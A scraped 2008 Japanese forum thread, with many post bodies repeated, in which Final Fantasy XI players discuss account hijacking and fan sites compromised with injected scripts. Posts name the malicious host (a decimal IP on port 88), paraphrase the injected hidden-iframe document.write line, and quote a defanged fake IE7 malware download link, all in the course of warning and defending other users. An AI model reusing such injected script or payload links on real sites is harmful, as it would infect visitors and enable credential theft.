人、神、四神印章、裏貨幣、等も放置だったし。
担当?する人によるのかも。
7/5の大漁時だったから、とっとと次垢に行ったのかもね。
人、神、四神印章、裏貨幣、等も放置だったし。
担当?する人によるのかも。
533 :532:2008/08/10(日) 13:38:57 ID:p89+26ck
追記
ハックされて、ログインされた時、フレが気づいて連絡くれて、別垢(別PC)や
リアルフレ等複数で、Tell送りまくったり、宅配前で、トレードしたりして
邪魔しまくってたからかも。
ハックされて、ログインされた時、フレが気づいて連絡くれて、別垢(別PC)や
リアルフレ等複数で、Tell送りまくったり、宅配前で、トレードしたりして
邪魔しまくってたからかも。
534 :既にその名前は使われています:2008/08/10(日) 13:56:08 ID:oSAxQvIp
535 :既にその名前は使われています:2008/08/10(日) 13:58:59 ID:HvN/kX/S
RMTやマネーロンダリングと絡めて、大々的にどこか特集してくれないかな。
どうせなら■へ突撃インタビューも含めて。
正直、このくらいないとまともに動いてくれなそう。
どうせなら■へ突撃インタビューも含めて。
正直、このくらいないとまともに動いてくれなそう。
536 :既にその名前は使われています:2008/08/10(日) 14:06:31 ID:ZjhbzfYJ
垢ハックに便乗して、持ち逃げするあふぉも増えてるからなあ
わざわざ専用スレまで立てたバハ鯖のKeycleとかも、結局垢ハック嘘だったし・・・
ここでハックされた報告が全て嘘だとは思わんが、鵜呑みにするのもどうかと思う
わざわざ専用スレまで立てたバハ鯖のKeycleとかも、結局垢ハック嘘だったし・・・
ここでハックされた報告が全て嘘だとは思わんが、鵜呑みにするのもどうかと思う
537 :既にその名前は使われています:2008/08/10(日) 14:12:01 ID:QPDXPAsY
マップガイドをソースチェッカーオンラインで確認しても問題ないんだけど
実際開いてみると例のウイルスサイトに繋ごうとするんだよね
どんな仕組みだろ
実際開いてみると例のウイルスサイトに繋ごうとするんだよね
どんな仕組みだろ
538 :既にその名前は使われています:2008/08/10(日) 14:17:28 ID:YySDbD9n
>>537
ソースチェッカーで見たときのソース欄を見る限り、
タグの関係か何かでどうもページの途中でチェックを終えてるっぽい
問題のスクリプトは一番下のほうにあるからチェックできてないね。
別のソースチェッカーで見たらばっちり出てくる
ソースチェッカーで見たときのソース欄を見る限り、
タグの関係か何かでどうもページの途中でチェックを終えてるっぽい
問題のスクリプトは一番下のほうにあるからチェックできてないね。
別のソースチェッカーで見たらばっちり出てくる
539 :既にその名前は使われています:2008/08/10(日) 14:20:55 ID:QPDXPAsY
そうだったのか
HTMLを直接編集されるってのは恐ろしいな
XREAセキュリティ甘すぎるなぁ
HTMLを直接編集されるってのは恐ろしいな
XREAセキュリティ甘すぎるなぁ
540 :既にその名前は使われています:2008/08/10(日) 16:24:52 ID:yBJC8U5g
にじうらに盛んにxreaのURL貼ってる奴が居るんだが
やっぱり罠なのか?
やっぱり罠なのか?
541 :既にその名前は使われています:2008/08/10(日) 16:33:18 ID:zFxUwJHX
age
542 :既にその名前は使われています:2008/08/10(日) 16:46:54 ID:WI8QwvVt
543 :既にその名前は使われています:2008/08/10(日) 16:56:14 ID:B25VcJ+i
自分の時はまったく見なかったけど、FFAHを見る限り、怪しい高額アイテムを
売ってる人は後を絶たないね。
売ってる人は後を絶たないね。
544 :既にその名前は使われています:2008/08/10(日) 16:58:42 ID:UwBaGP17
自己責任ではあるがいつ新種が出るか分からんし
鯖に穴があるなら塞いでほしい
泥棒業者も便乗愉快犯もシネ
鯖に穴があるなら塞いでほしい
泥棒業者も便乗愉快犯もシネ
545 :既にその名前は使われています:2008/08/10(日) 17:03:15 ID:Zto8vCIZ
競売だけじゃなく乗っ取ったキャラで堂々とシャウトで物売ったり印章消化しようとしてる奴いるぞー
546 :既にその名前は使われています:2008/08/10(日) 17:43:30 ID:V6NeZhnb
547 :既にその名前は使われています:2008/08/10(日) 17:45:22 ID:YySDbD9n
>>546
ありゃー、垢BANとかは食らってなかった?
ありゃー、垢BANとかは食らってなかった?
548 :既にその名前は使われています:2008/08/10(日) 18:12:58 ID:h3bRhtYR
ワープで使われるキャラのほとんどが垢ハックで被害にあった奴のキャラ
中華は新アカウントでワープを繰り返してるわけではないのでBANされても痛くも痒くもない。何度でも繰り返す
中華は新アカウントでワープを繰り返してるわけではないのでBANされても痛くも痒くもない。何度でも繰り返す
549 :既にその名前は使われています:2008/08/10(日) 18:51:19 ID:GRED31jJ
痛くも痒くも無いので通報しないで;;まで読んだ
お断りします
お断りします
550 :既にその名前は使われています:2008/08/10(日) 19:10:51 ID:WI8QwvVt
551 :既にその名前は使われています:2008/08/10(日) 20:05:45 ID:plJUV6eZ
いま新しい手口が流行りかかってるんだからあげあげで行かないとですよ
552 :既にその名前は使われています:2008/08/10(日) 20:11:43 ID:zFxUwJHX
垢ハックにおびえながらプレイするんじゃなくて普通にプレイできる状況が懐かしい
553 :既にその名前は使われています:2008/08/10(日) 20:12:19 ID:4AoqWpzf
しかし、ハックされる奴はセキュリティーざるだわ、ここは見てないわだからな
ハックされてから来るパターンばっかりじゃない?
で、来ていうのが「クリーンインストールって絶対しないといけないんですか?」だしな
そりゃ減らない罠
ハックされてから来るパターンばっかりじゃない?
で、来ていうのが「クリーンインストールって絶対しないといけないんですか?」だしな
そりゃ減らない罠
554 :既にその名前は使われています:2008/08/10(日) 20:19:55 ID:CQZ/Sw2P
>>553みたいな自称玄人はもうお腹いっぱい
555 :既にその名前は使われています:2008/08/10(日) 20:29:27 ID:5KsfBGvi
でも自称素人もおなかいっぱいなんじゃ?・・・
556 :既にその名前は使われています:2008/08/10(日) 20:33:00 ID:6CcXvgQD
FF11・マップガイドがやばいのか
白地図本舗とかだとRMT業者広告がいやだとかいう人いるっていうんで
わざわざ手書き地図っぽいあそこを地図サイトとして人に紹介しちまったよ・・・
どこにやばいスクリプトあるか確認に行きたいがこえーなー
フラッシュプレイヤ最新版でFirefoxでNoScriptとIFRAME禁止にしてあれば見に行っても平気だろうか
白地図本舗とかだとRMT業者広告がいやだとかいう人いるっていうんで
わざわざ手書き地図っぽいあそこを地図サイトとして人に紹介しちまったよ・・・
どこにやばいスクリプトあるか確認に行きたいがこえーなー
フラッシュプレイヤ最新版でFirefoxでNoScriptとIFRAME禁止にしてあれば見に行っても平気だろうか
557 :既にその名前は使われています:2008/08/10(日) 20:34:28 ID:YySDbD9n
558 :既にその名前は使われています:2008/08/10(日) 21:23:41 ID:kQDk+RIP
>>553
セキュリティの玄人ならここには踏み入らないのでは?w
ハックされてから始めて来ましたってのは今までも来ていたけど「まさか自分が」とか「恥ずかしいから」とか
そんな状態から出る言葉
まぁ簡単に言えばパニックだなw
自称玄人さんはいざハックされるとみんなそうなるよ^^;
>>553
これを読んだ君は今年の夏の終わり頃に順番が回ってくる予定だよ
セキュリティの玄人ならここには踏み入らないのでは?w
ハックされてから始めて来ましたってのは今までも来ていたけど「まさか自分が」とか「恥ずかしいから」とか
そんな状態から出る言葉
まぁ簡単に言えばパニックだなw
自称玄人さんはいざハックされるとみんなそうなるよ^^;
>>553
これを読んだ君は今年の夏の終わり頃に順番が回ってくる予定だよ
559 :既にその名前は使われています:2008/08/10(日) 21:31:59 ID:cAC722rd
マップガイドのトップページFF11.htmに見事にスクリプト埋め込まれてるな
メモ帳で見てもわかる
メモ帳で見てもわかる
560 :既にその名前は使われています:2008/08/10(日) 21:45:30 ID:+ZC2QURq
昨日姫と生で本番したら感染した(T_T)
561 :既にその名前は使われています:2008/08/10(日) 21:50:39 ID:YySDbD9n
>>560
風俗スレ池
風俗スレ池
562 :既にその名前は使われています:2008/08/10(日) 21:52:10 ID:4AoqWpzf
みんなセキュリティーの玄人とかプロなんか言ってないのに一部の奴が相手をプロやら玄人といって馬鹿にしてるだけだろ?
上で何人もが言ってるが少しでもPCがおかしいと思ったら調べる癖がついてればウイルスが入ったとしてもキャラをハックされるまでに対処できたかもしれない訳だ
htmlソースを直接改竄されるような事態が出てる以上どれだけ気をつけても足りないわけだ
>>558
改竄されたHPの報告やらしてくれてる人もいるんだからそういう態度は頂けないぜ
上で何人もが言ってるが少しでもPCがおかしいと思ったら調べる癖がついてればウイルスが入ったとしてもキャラをハックされるまでに対処できたかもしれない訳だ
htmlソースを直接改竄されるような事態が出てる以上どれだけ気をつけても足りないわけだ
>>558
改竄されたHPの報告やらしてくれてる人もいるんだからそういう態度は頂けないぜ
563 :既にその名前は使われています:2008/08/10(日) 22:02:05 ID:WI8QwvVt
564 :既にその名前は使われています:2008/08/10(日) 22:04:36 ID:6CcXvgQD
NoScriptで確認した
右クリックリストで
h tt p:// 1039045744:88を許可 ってのが出るな、これか・・・
サイト管理者に連絡しようにも連絡先すら載ってない
ちゃんと管理者明記されてるサイトじゃないとダメだな
管理者不明のサイトを人に紹介するのはもう止めよう・・・
右クリックリストで
h tt p:// 1039045744:88を許可 ってのが出るな、これか・・・
サイト管理者に連絡しようにも連絡先すら載ってない
ちゃんと管理者明記されてるサイトじゃないとダメだな
管理者不明のサイトを人に紹介するのはもう止めよう・・・
565 :既にその名前は使われています:2008/08/10(日) 22:14:51 ID:pYO9ixmb
FF11マップガイドに埋め込まれてたスクリプトって
どのオプションに分類されるのかわからないかな
今のところログイン中で落とされてはいないんだけど
NoScript入れてなかった状態で最近踏んだので不安・・・
どのオプションに分類されるのかわからないかな
今のところログイン中で落とされてはいないんだけど
NoScript入れてなかった状態で最近踏んだので不安・・・
566 :既にその名前は使われています:2008/08/10(日) 22:21:19 ID:YySDbD9n
567 :既にその名前は使われています:2008/08/10(日) 22:30:03 ID:pYO9ixmb
568 :既にその名前は使われています:2008/08/10(日) 22:36:45 ID:YySDbD9n
>>567
WUとFlashPlayerの更新が済んでるなら感染の可能性はだいぶ下がるだろうけど、
大丈夫って断言できないからなー
どれだけスキャンして無事が確認できても何か気持ち悪さが残るんだよね。
クリンスコできる状況ならやっちまったほうがすっきりするかもなー
そして今後はFireFoxとNoScriptも導入するよろし
WUとFlashPlayerの更新が済んでるなら感染の可能性はだいぶ下がるだろうけど、
大丈夫って断言できないからなー
どれだけスキャンして無事が確認できても何か気持ち悪さが残るんだよね。
クリンスコできる状況ならやっちまったほうがすっきりするかもなー
そして今後はFireFoxとNoScriptも導入するよろし
569 :既にその名前は使われています:2008/08/10(日) 22:37:32 ID:4AoqWpzf
>>567
踏んだ日付覚えてるか?あと、ブラウザはIE?OSは?
とりあえずウイルススキャンしてみたら?亜種だったら見つからないと思うが
何かしら症状が出ればクリーンインスコっていうが、今の状態では気になるならした方が良いだろうな。
後々の事とビクビクしながらFFしたくないなら
踏んだ日付覚えてるか?あと、ブラウザはIE?OSは?
とりあえずウイルススキャンしてみたら?亜種だったら見つからないと思うが
何かしら症状が出ればクリーンインスコっていうが、今の状態では気になるならした方が良いだろうな。
後々の事とビクビクしながらFFしたくないなら
570 :既にその名前は使われています:2008/08/10(日) 22:40:33 ID:+uPpoUAR
このアカハックのご時世に
こんな馬鹿なやつらもいるんで是非ご覧ください↓
【基地外警報wFF11初の裁判決行になるか!?】
FF11にてwアカウント共有をしていた『規約違反者w』同士が
アイテムを盗る盗られたで片方が さいばんw を起こす模様ですwww
http://changi.2ch.net/test/read.cgi/ogame/1218192684/
みんな見に来てね!
こんな馬鹿なやつらもいるんで是非ご覧ください↓
【基地外警報wFF11初の裁判決行になるか!?】
FF11にてwアカウント共有をしていた『規約違反者w』同士が
アイテムを盗る盗られたで片方が さいばんw を起こす模様ですwww
http://changi.2ch.net/test/read.cgi/ogame/1218192684/
みんな見に来てね!
571 :既にその名前は使われています:2008/08/10(日) 22:43:15 ID:pYO9ixmb
572 :既にその名前は使われています:2008/08/10(日) 22:44:33 ID:PYIKDmKO
今後、不正アクセスに関しては、インフォメーションセンターへのお電話ではなく、「不正アクセス専用チャットサポート」にてお問い合わせください
https://secure.playonline.com/support/index.html
https://secure.playonline.com/support/index.html
573 :既にその名前は使われています:2008/08/10(日) 22:47:53 ID:4AoqWpzf
あそこの報告があったのは8/8の深夜だった記憶が、ちょっと定かではないが
悪いことはいわん、ブラウザにIE使うのだけはやめておけ
何もでないことを祈るわ
悪いことはいわん、ブラウザにIE使うのだけはやめておけ
何もでないことを祈るわ
574 :既にその名前は使われています:2008/08/10(日) 23:07:14 ID:iQYW/NEJ
こんな奴等がいる限り垢ハックはなくならない
http://search.auctions.yahoo.co.jp/search/auc?p=FF11&auccat=0
http://search.auctions.yahoo.co.jp/search/auc?p=FF11&auccat=0
575 :既にその名前は使われています:2008/08/10(日) 23:09:02 ID:h1LOJgk1
576 :既にその名前は使われています:2008/08/10(日) 23:16:43 ID:DUlDt+Ln
8月のMS月例パッチは12件、IEやOfficeの深刻な脆弱性に対処
米Microsoftは8月12日(日本時間13日)、月例アップデートで「緊急」レベル7件
「重要」レベル5件のセキュリティ更新プログラムを公開する。7日の事前告知で発表した。
ソースはITmedia
米Microsoftは8月12日(日本時間13日)、月例アップデートで「緊急」レベル7件
「重要」レベル5件のセキュリティ更新プログラムを公開する。7日の事前告知で発表した。
ソースはITmedia
577 :既にその名前は使われています:2008/08/10(日) 23:18:34 ID:Rt73tiEp
578 :既にその名前は使われています:2008/08/10(日) 23:19:28 ID:WI8QwvVt
Firefoxもセキュリティ考えてなさそーなアドオンが見え隠れして
薦めてるヤツは結構ドキドキな感じがしないか?w
薦めてるヤツは結構ドキドキな感じがしないか?w
579 :既にその名前は使われています:2008/08/10(日) 23:24:43 ID:YySDbD9n
>>578
こっちが素人用だが
https://addons.mozilla.org/ja/firefox/addon/4298
これとか素人には扱えなくて超危険だぜ!
http://www.mozilla.gr.jp/~makoto/shiitake/
(わかる人だけ踏んでください)
こっちが素人用だが
https://addons.mozilla.org/ja/firefox/addon/4298
これとか素人には扱えなくて超危険だぜ!
http://www.mozilla.gr.jp/~makoto/shiitake/
(わかる人だけ踏んでください)
580 :既にその名前は使われています:2008/08/10(日) 23:27:30 ID:WI8QwvVt
>>579
見て判ったが、癒されたわw
見て判ったが、癒されたわw
581 :既にその名前は使われています:2008/08/11(月) 00:04:43 ID:BdV5u1vn
Firefox使ってます。
xreaとfc2が怖いからProCon Latteという
フィルタのアドオン入れてみました。
フィルタするURLにxrea.comや
fc2.comを設定しておけば表示されなくなりました。
(このドメインのは見れなくてもいいやww)
Firefox3でも使えました。
参考までにどうぞ
xreaとfc2が怖いからProCon Latteという
フィルタのアドオン入れてみました。
フィルタするURLにxrea.comや
fc2.comを設定しておけば表示されなくなりました。
(このドメインのは見れなくてもいいやww)
Firefox3でも使えました。
参考までにどうぞ
582 :既にその名前は使われています:2008/08/11(月) 00:06:06 ID:IAR/KhZb
公式の接続先変わった?
583 :既にその名前は使われています:2008/08/11(月) 00:06:47 ID:BdV5u1vn
書き忘れましたw
ダウンロードは ttps://addons.mozilla.org/en-US/firefox/addon/1803 です
ダウンロードは ttps://addons.mozilla.org/en-US/firefox/addon/1803 です
584 :既にその名前は使われています:2008/08/11(月) 00:09:50 ID:7BJ3ob0m
585 :既にその名前は使われています:2008/08/11(月) 00:17:30 ID:BdV5u1vn
>>584
xreaがつくURLだけでもよかですわw
xreaがつくURLだけでもよかですわw
586 :既にその名前は使われています:2008/08/11(月) 00:42:55 ID:VKINbCQW
使ったばっかなんで間違ったらアレだが、
netbenriは弾けないぞ?
今回の騒動の元になったxreaのサイトな。
netbenriは弾けないぞ?
今回の騒動の元になったxreaのサイトな。
587 :既にその名前は使われています:2008/08/11(月) 00:48:36 ID:BdV5u1vn
588 :既にその名前は使われています:2008/08/11(月) 00:52:41 ID:VKINbCQW
>>587
回答がずれてる事に気付いてくれ。
回答がずれてる事に気付いてくれ。
589 :既にその名前は使われています:2008/08/11(月) 01:02:19 ID:BdV5u1vn
単純にURLでのフィルタだけで
実際のホストまでを見ては弾けないです。
すんませんでした・・・orz
実際のホストまでを見ては弾けないです。
すんませんでした・・・orz
590 :既にその名前は使われています:2008/08/11(月) 01:08:00 ID:IAR/KhZb
FF11・マップガイド 〜 orz< びっくりするほど よい旅を! 〜
591 :既にその名前は使われています:2008/08/11(月) 01:18:50 ID:VKINbCQW
592 :既にその名前は使われています:2008/08/11(月) 01:23:14 ID:IAR/KhZb
わたくしはドメイン云々の会話には参加してないと思われ
593 :既にその名前は使われています:2008/08/11(月) 01:39:05 ID:VKINbCQW
>>592
なるほど、582が581に対する問いで無かったのなら申し訳ない。
なるほど、582が581に対する問いで無かったのなら申し訳ない。
594 :既にその名前は使われています:2008/08/11(月) 02:09:29 ID:4K3aYIsW
自分の垢売って、その後■eに垢ハックされたって報告した奴とかいる?
595 :既にその名前は使われています:2008/08/11(月) 02:13:40 ID:jnLumUjL
>>594
ここは詐欺のやり方教えるところじゃありませんよ
ここは詐欺のやり方教えるところじゃありませんよ
596 :既にその名前は使われています:2008/08/11(月) 02:14:14 ID:rdDKceCE
巻き戻す場合、警察に届け出すの必要らしいじゃん。
通用しないんじゃね。
通用しないんじゃね。
597 :既にその名前は使われています:2008/08/11(月) 02:17:52 ID:7BJ3ob0m
先日のXREAの件、セキュmemoに載ったのね。
これでXREAも何らかのアナウンス出すことになるんじゃないかな。
これでXREAも何らかのアナウンス出すことになるんじゃないかな。
598 :既にその名前は使われています:2008/08/11(月) 02:30:38 ID:V5vaNjM5
599 :既にその名前は使われています:2008/08/11(月) 02:34:19 ID:LBaDTpFY
>>590のサイトを何日か前開いてしまったんだがaviraがピコピコッと反応して
access deny(接続拒否、だよな?)でokしといたけどこれで対応良かったんだろうか?
それ選んだ後に普通にそのサイト見れたからちゃんと問題のものに接続拒否出来てたのかどうか。
FFやってるPCじゃないから感染しても被害は無いけど、Quarantine(検疫)にしとくべきだったんだろうか。
引っかかったのはHEUR/HTML.Malwareってのだった。
取り合えず>>13のを試してみてwzcsvbxm.dllはなかったが。
access deny(接続拒否、だよな?)でokしといたけどこれで対応良かったんだろうか?
それ選んだ後に普通にそのサイト見れたからちゃんと問題のものに接続拒否出来てたのかどうか。
FFやってるPCじゃないから感染しても被害は無いけど、Quarantine(検疫)にしとくべきだったんだろうか。
引っかかったのはHEUR/HTML.Malwareってのだった。
取り合えず>>13のを試してみてwzcsvbxm.dllはなかったが。
600 :既にその名前は使われています:2008/08/11(月) 02:39:50 ID:ALdhVNDH
>>594
前に一人いたよ。
が、たとえゲーム内で規約違反でも、現実の取引で詐欺をはたらいたことになるから
垢買い側に訴えられたら間違いなく負ける。
契約不履行の民事だか詐欺罪での刑事だかはわからない。眠いから調べる気力がない。
ま、要するにゲームで一時的に勝ってもリアルで負ける。
前に一人いたよ。
が、たとえゲーム内で規約違反でも、現実の取引で詐欺をはたらいたことになるから
垢買い側に訴えられたら間違いなく負ける。
契約不履行の民事だか詐欺罪での刑事だかはわからない。眠いから調べる気力がない。
ま、要するにゲームで一時的に勝ってもリアルで負ける。
601 :既にその名前は使われています:2008/08/11(月) 02:58:47 ID:cthKcj+T
せきゅmemoすげーな
分かり易い
分かり易い
602 :既にその名前は使われています:2008/08/11(月) 03:00:14 ID:7BJ3ob0m
>>599
今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。
今回XREAに仕掛けられていたのを踏んで投下されるのは
「wzcsvbxm.dll」じゃなくて信長の野望Onlineで話題になっていた(らしい)
「KernaeghDrv.dll」ね。
英Sophosの検出名「Troj/Lineag-DV」の
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojlineagdv.html
の「More Information」参照。
603 :既にその名前は使われています:2008/08/11(月) 05:04:17 ID:/L29dZn7
なんかFirefoxの対策についてしか出てないんだが、
Operaの場合はnoscriptの代替としては
ツール>設定>詳細設定>コンテンツをたどって
・JavaScriptを有効にする
・Javaを有効にする
のチェックをはずしてiFrameを無効にしておけばいい?
プラグインを有効にするのチェックもはずしたほうがいいのかな?
もちろん今後のことはわからないから、今までの範囲の話だけど
Operaの場合はnoscriptの代替としては
ツール>設定>詳細設定>コンテンツをたどって
・JavaScriptを有効にする
・Javaを有効にする
のチェックをはずしてiFrameを無効にしておけばいい?
プラグインを有効にするのチェックもはずしたほうがいいのかな?
もちろん今後のことはわからないから、今までの範囲の話だけど
604 :既にその名前は使われています:2008/08/11(月) 05:31:51 ID:QVO+kBur
なんかメールでこんなのが来たんだけど;
www★jabotana★mynetcologne★de/explorer-7★0★exe
.→★でつ
www★jabotana★mynetcologne★de/explorer-7★0★exe
.→★でつ
605 :既にその名前は使われています:2008/08/11(月) 05:45:32 ID:LPVCczNQ
おいおい、いきなり他のPCから起動したうんぬんのメッセージ出て、追い出されたぞ。
で、ログインしようとしてもパスが違いますって入れない。
これが垢ハックかよorz
サポート対象外時間で\(^o^)/オワタ
で、ログインしようとしてもパスが違いますって入れない。
これが垢ハックかよorz
サポート対象外時間で\(^o^)/オワタ
606 :既にその名前は使われています:2008/08/11(月) 05:56:33 ID:LPVCczNQ
うは、しかも今日臨時休業ってふざけんなよ・・・・。
607 :既にその名前は使われています:2008/08/11(月) 06:44:40 ID:LPVCczNQ
俺もさっき被害にあったっぽいんだが、まじで1〜2ヶ月まき戻るのかorz
もの凄い被害になりそうなんだが。
もの凄い被害になりそうなんだが。
608 :既にその名前は使われています:2008/08/11(月) 06:45:12 ID:LPVCczNQ
ミスw
垢ハックスレのほうに書いたつもりでした。
垢ハックスレのほうに書いたつもりでした。
609 :既にその名前は使われています:2008/08/11(月) 06:57:21 ID:LBaDTpFY
>>602
なるほど、違う奴だからwzcsvbxm.dllの方を調べても意味無かったか。
何スレか前(田代砲云々とかwzcsvbxm.dllの話題が頻繁だった頃)辺りは読んでたんだが
ここ最近は忙しくて見てなかった。また別のが話題になってた訳だなー。
なるほど、違う奴だからwzcsvbxm.dllの方を調べても意味無かったか。
何スレか前(田代砲云々とかwzcsvbxm.dllの話題が頻繁だった頃)辺りは読んでたんだが
ここ最近は忙しくて見てなかった。また別のが話題になってた訳だなー。
610 :既にその名前は使われています:2008/08/11(月) 07:03:14 ID:JldOSKyz
www.netbenri.com、アクセスできなくなってる?
あと黒魔メモ、件のリンクが消えてた。
あと黒魔メモ、件のリンクが消えてた。
611 :既にその名前は使われています:2008/08/11(月) 07:31:09 ID:LPVCczNQ
GM44件待ち・・・
何時間かかんだよ(;´Д`)
何時間かかんだよ(;´Д`)
612 :既にその名前は使われています:2008/08/11(月) 07:43:55 ID:uwrZkdCV
>>611
一昨日6番目だったが7時間後にGMきた
一昨日6番目だったが7時間後にGMきた
613 :既にその名前は使われています:2008/08/11(月) 07:53:18 ID:S8epNX2T
ハッキングでデータ戻すことになったとき、■eは当然ハッキング後のアクセス元IPとかを
警察やプロバイダに届けてるんだよね?
あと、被害あった人は、その犯人の接続元とか教えてもらえるの?
警察やプロバイダに届けてるんだよね?
あと、被害あった人は、その犯人の接続元とか教えてもらえるの?
614 :既にその名前は使われています:2008/08/11(月) 07:57:02 ID:LPVCczNQ
>>612
ちょ・・・・・・orz
ちょ・・・・・・orz
615 :既にその名前は使われています:2008/08/11(月) 08:23:43 ID:1zwFHUrV
警察に届けるときは最寄りの交番でいいですか?
あと、なにの侵害っていうんでしたっけ…
あと、なにの侵害っていうんでしたっけ…
616 :既にその名前は使われています:2008/08/11(月) 08:52:22 ID:jjoX2Mag
617 :既にその名前は使われています:2008/08/11(月) 08:59:14 ID:vi2TYYkW
618 :既にその名前は使われています:2008/08/11(月) 09:09:57 ID:iObT9MdG
>>506
XREA 1039045744:88 の確認されたサイト
吟遊詩人テンプレ:メニュー ヘッダー
8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
?月?日?時?分頃〜8月11日?時?分頃
忍者テンプレとマップガイドは、いつから改竄されていたのか情報無し。
情報として改竄されていた報告はトップに載せておいて欲しいなぁ。
XREA 1039045744:88 の確認されたサイト
吟遊詩人テンプレ:メニュー ヘッダー
8月2日23時45分頃〜8月7日21時40分頃
忍者スレテンプレ:メニュー </body>と</html>の間
?月?日?時?分頃〜8月10日2時15分頃
黒魔協会:xml宣言の前
8月7日22時23分頃〜8月11日1時56分頃
FF11・マップガイド(ネット便利)フッターテーブル内
?月?日?時?分頃〜8月11日?時?分頃
忍者テンプレとマップガイドは、いつから改竄されていたのか情報無し。
情報として改竄されていた報告はトップに載せておいて欲しいなぁ。
619 :既にその名前は使われています:2008/08/11(月) 10:11:00 ID:+keKJFaA
620 :既にその名前は使われています:2008/08/11(月) 10:34:49 ID:1zwFHUrV
>>619
ありがとうございます。
いまアカウントを凍結している状態ですが、データ復元を明日依頼する予定です。その際に被害届を出したと伝えると、スクエニが早く(一週間くらい)対応してくれるでしょうか?
ありがとうございます。
いまアカウントを凍結している状態ですが、データ復元を明日依頼する予定です。その際に被害届を出したと伝えると、スクエニが早く(一週間くらい)対応してくれるでしょうか?
621 :既にその名前は使われています:2008/08/11(月) 10:35:50 ID:1zwFHUrV
622 :既にその名前は使われています:2008/08/11(月) 10:51:49 ID:SywjnnVm
623 :既にその名前は使われています:2008/08/11(月) 10:55:53 ID:RU97v4Vh
いやー、俺もやられましたwww
これやられると、モチが一気に無くなるねーー。
これやられると、モチが一気に無くなるねーー。
624 :既にその名前は使われています:2008/08/11(月) 11:14:11 ID:6vyqpTRl
7月にクレカで被害あって会社に電話してないけど8月1日に処理されるはずが
WEBの9月明細にはいってないぞ???(POL7月利用分なし)
興味あるから放置してるけど、本当に請求してくるかどうか・・・
クレカは即日決済って言ってるけど、処理してるのは毎月1日の午前0時〜4時ぐらいだろ?
現に6月のPOL利用分は7月1日決済で8月に請求されてるからな
つまり、現時点では7月の被害を8月1日に処理しなかった(1ヶ月間あるからスクエニが対応処理できるから)
スクエニが良心的に対応してくれていると考えていますが・・・違いますか?!
WEBの9月明細にはいってないぞ???(POL7月利用分なし)
興味あるから放置してるけど、本当に請求してくるかどうか・・・
クレカは即日決済って言ってるけど、処理してるのは毎月1日の午前0時〜4時ぐらいだろ?
現に6月のPOL利用分は7月1日決済で8月に請求されてるからな
つまり、現時点では7月の被害を8月1日に処理しなかった(1ヶ月間あるからスクエニが対応処理できるから)
スクエニが良心的に対応してくれていると考えていますが・・・違いますか?!
625 :既にその名前は使われています:2008/08/11(月) 11:24:46 ID:zXtTBRlk
1039045744:88のやつ ぴょん基地の友達で見てみたんだけど
クッキー書き換えしてない?
クッキーにJって文字列があったら 有効期限延ばして
document.write("<iframe src=http:\/\/やばいやつ:88 width=100 height=0><\/iframe>"
って書き換えるように読めるんだけど。
JS詳しくないんで勘違いならいいんだが...
クッキー書き換えしてない?
クッキーにJって文字列があったら 有効期限延ばして
document.write("<iframe src=http:\/\/やばいやつ:88 width=100 height=0><\/iframe>"
って書き換えるように読めるんだけど。
JS詳しくないんで勘違いならいいんだが...
626 :既にその名前は使われています:2008/08/11(月) 11:27:26 ID:9NDGF/io
>>624
昔どっかのえらい人が
理解なんてものは概ね願望に基づくものだ 現実は甘くない。
って言ってた。まあ座して待てよ。
ハクられて必死になるのはわかるが
引かれるか引かれないかはいずれわかる事だ。
昔どっかのえらい人が
理解なんてものは概ね願望に基づくものだ 現実は甘くない。
って言ってた。まあ座して待てよ。
ハクられて必死になるのはわかるが
引かれるか引かれないかはいずれわかる事だ。
627 :既にその名前は使われています:2008/08/11(月) 11:36:40 ID:BWkHYkWl
マジで電話つながらないな・・・
ガイダンスに従って入力しないとオペレーターと会話できないから話中でも50秒はかかるな。
しかもフリーダイヤルじゃねーし。50秒=30円 これを5分毎にリダイヤルして3時間後に繋がると約1000円かよ\(^o^)/
ガイダンスに従って入力しないとオペレーターと会話できないから話中でも50秒はかかるな。
しかもフリーダイヤルじゃねーし。50秒=30円 これを5分毎にリダイヤルして3時間後に繋がると約1000円かよ\(^o^)/
628 :既にその名前は使われています:2008/08/11(月) 11:51:41 ID:tFGPA71I
629 :既にその名前は使われています:2008/08/11(月) 11:53:24 ID:9+2CYNSn
どうせもはや1日位変わらないんだから素直に明日まで待ってチャットすればいいのに(^^;
630 :既にその名前は使われています:2008/08/11(月) 11:54:29 ID:IFFay0H8
最近ハックされた方も”事前症状”は以前と同じですか?
ウィンドウズアップデートが出来ない、終了オプションが異常に遅い
・・・等が、ありましたか?
ウィンドウズアップデートが出来ない、終了オプションが異常に遅い
・・・等が、ありましたか?
631 :既にその名前は使われています:2008/08/11(月) 11:55:06 ID:uwrZkdCV
632 :既にその名前は使われています:2008/08/11(月) 11:59:26 ID:CmSW/exM
633 :既にその名前は使われています:2008/08/11(月) 12:24:00 ID:7BJ3ob0m
>>604
それは偽IE7メールじゃないかな。
偽CNNメールと並んで世界中でうじゃうじゃ出回ってるspam。
こんなメール。うちにもいっぱい来てる。
偽IE7 ttp://pandasecurityus.wordpress.com/2008/08/06/fake-microsoft-internet-explorer-70-update/
偽CNN ttp://pandasecurityus.wordpress.com/2008/08/08/cnn-alerts-new-malcode-antivirus-xp-2008/
いずれもアカハックとは関係無し。
それは偽IE7メールじゃないかな。
偽CNNメールと並んで世界中でうじゃうじゃ出回ってるspam。
こんなメール。うちにもいっぱい来てる。
偽IE7 ttp://pandasecurityus.wordpress.com/2008/08/06/fake-microsoft-internet-explorer-70-update/
偽CNN ttp://pandasecurityus.wordpress.com/2008/08/08/cnn-alerts-new-malcode-antivirus-xp-2008/
いずれもアカハックとは関係無し。
634 :既にその名前は使われています:2008/08/11(月) 12:41:35 ID:0TWmzxxD
再度電話したら1(ry2(ryの後に「なお電話での不正アクセスに関するお問い合わせは受けておりません。ウェブからお申し込みください」が追加されてたwwww
しかも急いで録音したらしくかなりやっつけな音声wwwwwwwwww
